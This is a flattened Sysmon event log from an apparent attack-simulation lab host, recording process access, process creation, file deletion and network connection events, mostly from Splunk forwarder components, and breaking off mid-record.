15:07:31.138{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.138{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.138{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.138{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-74B3-613B-6FB4-03000000C801}2020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.138{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-74B3-613B-6FB4-03000000C801}2020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.123{B81B27B7-74B3-613B-6FB4-03000000C801}2020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:32.590{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CAA49703D4CF1DA9C55BAB8BFC32226,SHA256=214C6328348D4EE8E525CA365B60B4A6D7462E1B241147F7EDCC31E7F2034422,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:32.353{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-74B4-613B-71B4-03000000C801}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:32.353{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:32.353{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:32.353{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:32.353{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:32.353{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-74B4-613B-71B4-03000000C801}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:32.353{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-74B4-613B-71B4-03000000C801}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:32.338{B81B27B7-74B4-613B-71B4-03000000C801}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:32.290{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=653D8D0EA417008B241BAC0B8A623CF0,SHA256=26F1EE7DB6051ED112DC4076B2947DFB05D0ADBDAADC6DF0DABC800A4CC7259D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:33.604{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B19AA4E17232555AECD15E856319D1C,SHA256=398C1D3EC021EC433A53E4804C06A8A76B684E31CB2F98D884E9E71BC45853FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:33.489{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C0959181B99FCE4EECB63067E7CD5BBA,SHA256=CFF472F8709070D96BE9469703E5806108ED3627D61B2E0B7D7AB5744A7EE0DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:00.576{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52619-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035343965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:00.043{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52618-false10.0.1.12-8000- 23542300x800000000000000035343964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:34.650{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CEDBBB9BB07B6019EBE9386E66506A9D,SHA256=FD8F3D0B51919747AA7583915FE73DBE613C020CA7709EC9F8A7063C9C21B170,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:34.619{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A12B40FFDB9C6973E7472476119BBA85,SHA256=4DA1810C2F4FC2D18705B4E55343269F6857AA8306CA60073C695FC41E852BB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:34.135{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:34.135{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:34.135{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:35.634{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D754DBEDE4C92ADF3A8A0E3250918EF3,SHA256=C8E2097B3165015DD18661EF872A7C38AFD70ECBB83EB29EB00FAD6EE9E5199D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:36.639{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCA8450724E8145429C5BCB03F4FCDFE,SHA256=11FC7EE312E192CBF2245DDD83E297E9CE3B43FD5BB2EC615F45930ECAEE39DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:36.624{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF75fe22df.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:37.654{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03D8F5BA5B900BF296423A293D0E2A94,SHA256=ADE1726933DF611A0AE32D1781BFC7BC84D8D5875D3C36C6AB7E82812C99DFEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:38.671{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E6512E6EA1987A2397CDC167C65FEB6,SHA256=E3577750632A89A6CC9BCB0427517BD2C2D9929D921AE8E00C3ED85F90D4C272,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:39.706{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34EC9ADC44D5C44EA0AE4EFC37B49188,SHA256=B7CF57E45349E8EFA17CDDF8A5F975458507DF60D2A112643607D3F7E1CC9331,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:39.672{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=72DA65442D48C4098119853950BFDC97,SHA256=308C42CF87FE0128CD451A05277F5A56A4ECC88089801077184BEA20B605C183,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:40.725{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D89B6B03DE86516BF6A3EA918AD17C3,SHA256=91146A60CFE84CFF536948CB24CA3DBE81D4FFB05E6D16C08CBF910A25FB49B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:05.580{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52621-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035343974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:05.113{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52620-false10.0.1.12-8000- 23542300x800000000000000035343977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:41.772{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E375ABF9B1C7A69A2EB23522E5B209B,SHA256=45C324B59FA931F8F66E3294811ABE4E3DE7CA6E5C7E43671DD142A4BB6A9D45,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:42.807{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 